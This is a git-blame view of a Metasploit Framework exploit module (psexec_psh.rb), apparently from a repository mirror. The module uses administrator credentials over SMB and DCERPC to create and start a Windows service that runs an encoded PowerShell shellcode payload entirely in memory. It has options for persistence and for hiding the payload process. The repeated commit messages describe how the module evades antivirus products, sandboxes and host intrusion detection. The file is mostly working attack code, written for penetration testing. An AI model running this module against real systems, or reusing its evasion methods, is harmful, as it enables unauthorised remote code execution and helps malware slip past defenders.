infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/exploits/windows/smb/psexec_psh.rb

241 lines
7.3 KiB
Ruby
Raw Normal View History

Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
# -*- coding: binary -*-
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
Msf license
2013-07-04 09:08:29 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
require 'msf/core'
Add missing require
2013-07-04 08:58:48 +00:00
require 'msf/core/exploit/powershell'
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
class Metasploit3 < Msf::Exploit::Remote
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
Rank = ManualRanking
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
# Exploit mixins should be called first
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Exploit::Remote::SMB::Authenticated
include Msf::Exploit::Powershell
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
# Aliases for common classes
SIMPLE = Rex::Proto::SMB::SimpleClient
XCEPT = Rex::Proto::SMB::Exceptions
CONST = Rex::Proto::SMB::Constants
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Windows Authenticated Powershell Command Execution',
'Description' => %q{
This module uses a valid administrator username and password to execute a powershell
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
payload using a similar technique to the "psexec" utility provided by SysInternals. The
payload is encoded in base64 and executed from the commandline using the -encodedcommand
flag. Using this method, the payload is never written to disk, and given that each payload
is unique, is not prone to signature based detection. Since executing shellcode in .NET
requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
must match that of the payload. Lastly, a persist option is provided to execute the payload
in a while loop in order to maintain a form of persistence. In the event of a sandbox
observing PSH execution, a delay and other obfuscation may be added to avoid detection.
In order to avoid interactive process notifications for the current user, the psh payload has
been reduced in size and wrapped in a powershell invocation which hides the process entirely.
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
},
'Author' => [
'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
],
'License' => MSF_LICENSE,
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 8192,
'DisableNops' => true,
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', { } ],
],
'DefaultTarget' => 0,
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
'References' => [
[ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
[ 'OSVDB', '3106'],
[ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
[ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
[ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
]
))
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
register_options([
OptBool.new('PERSIST', [false, 'Run the payload in a loop']),
OptBool.new('RUN_WOW64', [
false,
'Execute powershell in 32bit compatibility mode, payloads need native arch',
false
]),
OptBool.new('PSH_OLD_METHOD', [false, 'Use powershell 1.0', false]),
], self.class)
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
end
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
def exploit
command = cmd_psh_payload(payload.encoded,datastore['PSH_OLD_METHOD'])
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
#Try and authenticate with given credentials
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
if connect
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
begin
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
smb_login
rescue StandardError => autherror
print_error("#{peer} - Unable to authenticate with given credentials: #{autherror}")
return
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
end
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
# Execute the powershell command
begin
print_status("#{peer} - Executing the payload...")
vprint_good(command)
return psexec(command)
rescue StandardError => exec_command_error
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
return false
end
add libs from #1379 and allow psh 1.0 exec against older hosts
2013-01-30 17:38:53 +00:00
disconnect
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
end
end
# This code was stolen straight out of psexec.rb. Thanks very much HDM and all who contributed to that module!!
# Instead of uploading and runing a binary. This method runs a single windows command fed into the COMMAND paramater
def psexec(command)
simple.connect("\\\\#{datastore['RHOST']}\\IPC$")
handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"])
vprint_status("#{peer} - Binding to #{handle} ...")
dcerpc_bind(handle)
vprint_status("#{peer} - Bound to #{handle} ...")
vprint_status("#{peer} - Obtaining a service manager handle...")
scm_handle = nil
stubdata =
NDR.uwstring("\\\\#{rhost}") +
NDR.long(0) +
NDR.long(0xF003F)
begin
response = dcerpc.call(0x0f, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
scm_handle = dcerpc.last_response.stub_data[0,20]
end
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
return false
end
servicename = Rex::Text.rand_text_alpha(11)
displayname = Rex::Text.rand_text_alpha(16)
holdhandle = scm_handle
svc_handle = nil
svc_status = nil
stubdata =
scm_handle +
NDR.wstring(servicename) +
NDR.uwstring(displayname) +
NDR.long(0x0F01FF) + # Access: MAX
NDR.long(0x00000110) + # Type: Interactive, Own process
NDR.long(0x00000003) + # Start: Demand
NDR.long(0x00000000) + # Errors: Ignore
NDR.wstring( command ) +
NDR.long(0) + # LoadOrderGroup
NDR.long(0) + # Dependencies
NDR.long(0) + # Service Start
NDR.long(0) + # Password
NDR.long(0) + # Password
NDR.long(0) + # Password
NDR.long(0) # Password
begin
vprint_status("#{peer} - Creating the service...")
response = dcerpc.call(0x0c, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
svc_handle = dcerpc.last_response.stub_data[0,20]
svc_status = dcerpc.last_response.stub_data[24,4]
end
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
return false
end
vprint_status("#{peer} - Closing service handle...")
begin
response = dcerpc.call(0x0, svc_handle)
rescue ::Exception
end
vprint_status("#{peer} - Opening service...")
begin
stubdata =
scm_handle +
NDR.wstring(servicename) +
NDR.long(0xF01FF)
response = dcerpc.call(0x10, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
svc_handle = dcerpc.last_response.stub_data[0,20]
end
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
return false
end
vprint_status("#{peer} - Starting the service...")
stubdata =
svc_handle +
NDR.long(0) +
NDR.long(0)
begin
response = dcerpc.call(0x13, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
end
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
return false
end
vprint_status("#{peer} - Removing the service...")
stubdata =
svc_handle
begin
response = dcerpc.call(0x02, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
end
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
end
vprint_status("#{peer} - Closing service handle...")
begin
response = dcerpc.call(0x0, svc_handle)
rescue ::Exception => e
print_error("#{peer} - Error: #{e}")
end
select(nil, nil, nil, 1.0)
simple.disconnect("\\\\#{datastore['RHOST']}\\IPC$")
return true
end
This commit completes powershell based psexec The original module suffered from a small problem - interactive process notification from Desktop 0 for users currently logged in. Although acheiving full AV evasion, we were setting off UserAlert. This commit updates the module itself to match #1379 in R7's repo. The size of powershell payloads has been reduced, and a wrapper added to hide the actual payload process entirely.
2013-02-05 01:39:05 +00:00
def peer
return "#{rhost}:#{rport}"
end
Add disk-less AV bypass PSExec module using PSH This commit rewires the existing work on PSExec performed by R3dy, HDM, and countless others, to execute a powershell command instead of a binary written to the disk. This particular iteration uses PSH to call .NET, which pull in WINAPI functions to execute the shellcode in memory. The entire PSH script is compressed with ZLIB, given a decompressor stub, encoded in base64 and executed directly from the command-line with powershell -EncodedCommand. In practice, this prevents us from having to write binaries with shellcode to the target drive, deal with removal, or AV detection at all. Moreover, the powershell wrapper can be quickly modified to loop execution (included), or perform other obfu/delay in order to confuse and evade sandboxing and other HIDS mechanisms. This module has been tested with x86/x64 reverse TCP against win6, win7 (32 and 64), and Server 2008r2. Targets tested were using current AV with heuristic analysis and high identification rates. In particular, this system evaded Avast, KAV current, and MS' own offerings without any issue. In fact, none of the tested AVs did anything to prevent execution or warn the user. Lastly, please note that powershell must be running in the same architecture as the payload being executed, since it pulls system libraries and their functions from unmanaged memory. This means that when executing x86 payloads on x64 targets, one must set the RUN_WOW64 flag in order to forcibly execute the 32bit PSH EXE.
2013-01-21 02:46:26 +00:00
end